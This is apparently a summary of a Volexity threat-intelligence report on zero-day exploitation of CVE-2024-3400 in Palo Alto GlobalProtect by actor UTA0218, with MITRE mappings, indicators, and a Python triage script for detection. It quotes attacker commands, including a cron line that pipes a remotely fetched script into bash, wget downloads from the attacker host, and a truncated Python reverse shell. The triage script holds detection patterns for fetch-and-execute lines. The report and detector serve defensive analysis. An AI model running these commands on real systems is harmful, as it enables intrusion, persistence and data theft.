Zero-Day Exploitation of Unauthenticated Remote Code Execution Vulnerability in GlobalProtect (CVE-2024-3400)

Volexity observed a zero-day unauthenticated remote code execution vulnerability in Palo Alto Networks GlobalProtect (CVE-2024-3400) being exploited by a tracked actor to gain shell access, download tooling, and exfiltrate configuration data. The attacker (UTA0218) deployed a Python backdoor named UPSTYLE, established cron-based persistence and tunneled access using tools like GOST and reverse-SSH. #UPSTYLE #UTA0218 #GlobalProtect #CVE-2024-3400 #PaloAltoNetworks

Keypoints

  • Volexity detected active exploitation of an unauthenticated RCE in GlobalProtect PAN-OS (CVE-2024-3400) beginning in late March and confirmed compromises in April 2024.
  • The threat actor UTA0218 created reverse shells, downloaded tooling, and exported firewall configuration for lateral entry into victim networks.
  • UTA0218 attempted to install a Python backdoor named UPSTYLE by placing a malicious .pth file at /usr/lib/python3.6/site-packages/system.pth to force code execution on Python import.
  • Persistence was implemented via a cron job (/etc/cron.d/update) that fetched a remote “policy” script every minute; multiple policy variants performed reverse shells, config exfil, tunneling, and SSH-based reverse shells.
  • Downloaded tooling included GOST (SOCKS/RTCP tunneling) and an open-source reverse-SSH binary; attacker infrastructure centered on 172.233.228[.]93 and a mix of VPS, compromised routers, and an abused AWS bucket.
  • Lateral movement leveraged a privileged service account to pivot via SMB and WinRM to steal NTDS.DIT, DPAPI keys, browser cookies/login data, and Windows event artifacts.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – The attacker exploited an unauthenticated remote code execution vulnerability in GlobalProtect (described as an ‘unauthenticated remote code execution vulnerability’ and assigned CVE-2024-3400).
  • [T1059.006] Command and Scripting Interpreter: Python – The actor executed one-liner Python reverse shells and Python backdoors: ‘python -c “import sys,socket,os,pty;…”;’
  • [T1105] Ingress Tool Transfer – Tools and payloads were fetched from attacker servers using HTTP/wget: ‘wget http://172.233.228[.]93/vpn.log -O /tmp/vpn.log’ and similar commands.
  • [T1053.003] Scheduled Task/Job: Cron – Persistence was achieved by creating a cron file that runs every minute to fetch and execute remote content: ‘* * * * * root wget -qO- http://172.233.228[.]93/policy | bash’.
  • [T1574] Hijack Execution Flow – The UPSTYLE backdoor abused Python .pth semantics to execute code on module import by writing ‘/usr/lib/python3.6/site-packages/system.pth’ and relying on ‘lines in .pth files beginning with the text “import” … are executed’.
  • [T1021.002] Remote Services: SMB – The attacker pivoted into internal hosts via SMB using a privileged service account: ‘pivot internally across the affected networks via SMB and WinRM’.
  • [T1021.006] Remote Services: Windows Remote Management (WinRM) – WinRM was used alongside SMB for lateral access: ‘pivot internally across the affected networks via SMB and WinRM’.
  • [T1003] OS Credential Dumping – Attacker targeted Active Directory and DPAPI secrets, exfiltrating ‘NTDS.DIT’ and domain DPAPI backup keys: ‘grab the domain backup DPAPI keys and targeting active directory credentials by obtaining the NTDS.DIT file’.
  • [T1090] Proxy – The actor attempted to deploy GOST to create SOCKS/RTCP tunnels and proxy access into victim networks: ‘GOST (GO Simple Tunnel)’ and commands to run it as a background proxy.

Indicators of Compromise

  • [IP Address] Attacker C2 and hosting – 172.233.228[.]93 (used to serve policy/vpn.log/vpn_prot), and other VPS/compromised hosts noted.
  • [File hashes] Malicious payloads and tooling – update.py SHA256: 3de2a4392b87…9caac, gost-linux-amd64 SHA256: 448fbd7b3389…5b7c, reverse-sshx64 SHA256: 161fd76c83e5…50f8, and several other policy/patch hashes.
  • [Filenames] Artifacts used on appliances – update.py, patch, policy, system.pth, /var/appweb/sslvpndocs/global-protect/*.css (used to store command output).
  • [URLs / Domains] Remote fetch and anomalous requests – http://172.233.228[.]93/policy (attacker-hosted), and observed HTTP GET to worldtimeapi[.]org/api/timezone/etc/utc originating from the appliance.
  • [File paths] Malicious persistence and I/O locations – /usr/lib/python3.6/site-packages/system.pth, /etc/cron.d/update, /var/log/pan/sslvpn_ngx_error.log, and /var/appweb/sslvpndocs/global-protect/bootstrap.min.css.

The exploitation sequence began with unauthenticated RCE against GlobalProtect (CVE-2024-3400) to spawn reverse shells (Python one-liners) and execute commands. After initial access, the attacker fetched secondary payloads via HTTP/wget from 172.233.228[.]93 (examples: vpn.log, vpn_prot.gz, lowdp) and executed them to establish tunnels and remote shells (GOST, reverse-sshx64). UPSTYLE, the Python backdoor, was installed by placing a malicious .pth file at /usr/lib/python3.6/site-packages/system.pth; it decodes commands embedded in inbound requests by reading /var/log/pan/sslvpn_ngx_error.log, writes command output into an existing CSS file (bootstrap.min.css) so it can be retrieved over the web interface, and restores the file's original timestamps to hide the modification.

Persistence was additionally implemented by a ‘patch’ script that created /etc/cron.d/update; the cron job runs every minute to wget a remote ‘policy’ script and pipe it to bash. Multiple ‘policy’ variants were used sequentially to (1) launch Python reverse shells, (2) copy the firewall's running-config.xml into a web-accessible CSS file for exfiltration, (3) deploy and run GOST tunneling (SOCKS/RTCP), and (4) deploy an SSH-based reverse shell listening on port 31289. The attacker also manually managed ACLs on their C2 so that only targeted devices could reach the servers.

After establishing a foothold, the actor pivoted internally using a privileged service account via SMB and WinRM to collect AD and workstation artifacts: NTDS.DIT, DPAPI backup keys, Windows event logs, and browser artifacts (Login Data, Cookies, Local State) to recover credentials and session tokens. Detection guidance: monitor for outbound wget/HTTP requests from GlobalProtect appliances (notably to 172.233.228[.]93 or any unexpected host), SMB/WinRM sessions originating from firewalls, HTTP GETs to worldtimeapi[.]org/api/timezone/etc/utc from the appliance, and inspect tech-support archives and /var/log/pan/sslvpn_ngx_error.log for injected command patterns. On the appliance itself, the artifacts to check are a .pth file under site-packages containing executable ‘import’ lines, a cron entry that pipes fetched content into a shell, and CSS files under /var/appweb/sslvpndocs/global-protect/ that contain something other than stylesheets.
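The host-side checks above, as an added triage example written for this summary (not Volexity's tooling): it flags the three artifact classes the report names, given file contents pulled from a tech-support bundle. The XML `<config` marker for an exported running-config.xml and all sample file contents are constructed assumptions.

```python
import re

# Python's site.py executes any .pth line beginning with "import " or "import\t";
# UPSTYLE abused exactly that. Legitimate .pth lines are paths or comments.
PTH_EXEC_PREFIXES = ("import ", "import\t")

# Cron entries that fetch remote content and pipe it straight into a shell,
# as in the report's "* * * * * root wget -qO- http://.../policy | bash".
CRON_FETCH_PIPE = re.compile(r"\b(wget|curl)\b[^|\n]*\|\s*(ba)?sh\b")

# Markers showing a "CSS" file really holds an exported firewall config
# (assumption: running-config.xml is an XML document with a <config> root).
CONFIG_MARKERS = ("<?xml", "<config")


def pth_exec_lines(pth_text: str) -> list:
    """Return .pth lines the interpreter would execute rather than treat as paths."""
    return [ln for ln in pth_text.splitlines() if ln.startswith(PTH_EXEC_PREFIXES)]


def cron_fetch_and_exec(cron_text: str) -> list:
    """Return cron lines that download remote content and pipe it to a shell."""
    return [ln for ln in cron_text.splitlines() if CRON_FETCH_PIPE.search(ln)]


def css_holds_config(css_text: str) -> bool:
    """True if a file served as CSS starts with an XML config instead of styles."""
    head = css_text.lstrip()[:512]
    return any(marker in head for marker in CONFIG_MARKERS)


def triage(files: dict) -> list:
    """Map {path: content} from a collected bundle to (path, reason) findings."""
    findings = []
    for path, content in files.items():
        if path.endswith(".pth") and pth_exec_lines(content):
            findings.append((path, "pth executes code on interpreter start"))
        elif path.startswith("/etc/cron.d/") and cron_fetch_and_exec(content):
            findings.append((path, "cron fetches remote script and pipes to shell"))
        elif path.endswith(".css") and css_holds_config(content):
            findings.append((path, "CSS file contains exported XML config"))
    return findings


# Constructed sample artifacts using the paths named in the report (not real captures).
SAMPLE_FILES = {
    "/usr/lib/python3.6/site-packages/system.pth":
        "import sys; print('constructed sample, not the real payload')\n",
    "/etc/cron.d/update": "* * * * * root wget -qO- http://172.233.228[.]93/policy | bash\n",
    "/var/appweb/sslvpndocs/global-protect/bootstrap.min.css":
        '<?xml version="1.0"?><config version="10.2.0">...</config>',
    "/usr/lib/python3.6/site-packages/legit.pth": "/usr/lib/python3.6/site-packages/pkg\n",
}

if __name__ == "__main__":
    for path, reason in triage(SAMPLE_FILES):
        print(f"{path}: {reason}")
```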

Read more: https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/